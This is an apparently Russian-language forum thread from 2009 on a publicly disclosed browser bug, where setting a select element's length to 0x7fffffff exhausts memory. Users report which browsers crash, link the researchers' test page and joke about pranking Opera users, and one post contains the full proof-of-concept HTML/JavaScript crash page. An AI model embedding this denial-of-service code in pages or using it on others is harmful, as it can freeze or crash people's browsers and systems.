AlkatraZ (SV!) [Off] [#] (18.07.2009 / 14:47) Уездный предводитель Каманчей

Эксперты G-SEC опубликовали подробности уязвимости, которая присуща большинству браузеров, и в результате которой браузеры либо вылетают совсем, либо используют столько памяти, что компьютер становится практически полностью непригодным к использованию.

Смысл уязвимости довольно прост. Используя DOM JavaScript, создай меню выбора на веб-странице, и элемент для такого выбора. Затем установи для него очень большое значение длины, и ты получишь процесс непрерывного выделения памяти. Атрибут длины указывает на то, сколько пунктов должен содержать элемент выбора, и по идее должен быть доступен только для чтения, однако может быть и записываемым.

AlkatraZ (SV!) [Off] [#] (18.07.2009 / 14:48) Уездный предводитель Каманчей

Пример кода свидетельствует о том, что этой проблеме подвержены не все браузеры. Так, при тестировании в Windows Vista вылетел лишь Internet Explorer 8. Firefox, Safari и Chrome остались незатронутыми, а Opera использовала много памяти, но при этом сохранила работоспособность. По данным G-SEC, проблема будет полностью устранена в следующей версии Opera.

Специалисты G-SEC отмечают, что Firefox 2.0.19 и 3.0.5 также не подвержены этой проблеме, однако более ранние версии будут использовать всю доступную память, после чего вылетят. Аналогичным образом поведут себя и ранние версии Chrome и Safari. В Ubuntu с Konquerer вылетает либо сам браузер, либо система целиком, что приводит к перезагрузке, вызванной тем, что система управления памятью Ubuntu "убивает" случайный процесс в памяти.

Стоит отметить, что исправить баг в Opera создатели браузера хотели еще в версии 9.64, однако не сделали этого. В свою очередь, Microsoft планирует исправить баг в Internet Explorer 9, у которого, возможно, будет новый движок JavaScript. Помимо этого, уязвимости подвержено большинство браузеров мобильных устройств (iPhone, Android и Symbian), а также игровых консолей (Wii и PS3), хотя в iPhone и устройствах на базе Android с последней версией движка WebKit эта проблема решена.

AlkatraZ (SV!) [Off] [#] (18.07.2009 / 14:49) Уездный предводитель Каманчей

Чтоб проверить свой браузер, зайдите сюды:
http://www.g-sec.lu/crash/select.html
и нажмите кнопочку

AlkatraZ (SV!) [Off] [#] (18.07.2009 / 14:55) Уездный предводитель Каманчей

Если хотите приколоться с Оперы, вначале включите менеджер задач и гляньте, сколько памяти берет опера.
Потом зайдите на ту страничку и жмите кнопку.
Далее, следите за памятью в диспетчере задач

еquivоcado [Off] [#] (18.07.2009 / 14:57)

О там даже Нокиа есть

$eq}I{iI{ [Off] [#] (18.07.2009 / 14:59)

Проверил...Жрёт сцука...

john77 (SV!) [Off] [#] (18.07.2009 / 17:50) чморылое одоробло

<html><head>

<script>
function poc(o) {
e = document.createElement("select");
e.length=2147483647;
}

function go() {
poc(0);
}
</script>
<form>
<font face= "courier new" size ="2">
Reference : [GSEC-TZO-26-2009] - One bug to rule them all<br>
WWW : <a href="http://www.g-sec.lu/one-bug-to-rule-them-all.html">G-SEC</a><br>
Credit : Thierry Zoller <br>
Root Cause : Design bug (non clamped)<br>
<br>
Browser will allocate huge chunks of memory and then most likely crash.<br>

Known patches: Firefox, Chrome, Safari, Opera<br>
Still vulnerable : IE5, IE6, IE7, IE8, WII, PS3, Nokia, Blackberry, Konqueror<br>

<b>Click "Select.lenght 0x7fffffff</b><br><br></font>

<input onclick="go()" value="Select lenght 0x7fffffff" type="button">
</form>
</body></html>

john77 (SV!) [Off] [#] (18.07.2009 / 17:52) чморылое одоробло

бля хня ето все, у мну сбоку панель с монитором системы, нажал я ту кнопку и ни на хуй значение аперативы не изменилось, браузер лиса 3.0.10, система дебиан

AlkatraZ (SV!) [Off] [#] (18.07.2009 / 18:33) Уездный предводитель Каманчей

john77 (18.07.2009/21:52)
бля хня ето все, у мну сбоку панель с монитором системы, нажал я ту кнопку и ни на хуй значение аперативы не изменилось, браузер лиса 3.0.10, система дебианНу Лиса нечувствительна к этому глюку.

Эксплорер рушится сразу, Опера не рушится, но начинает постепенно зохавывать оператьивку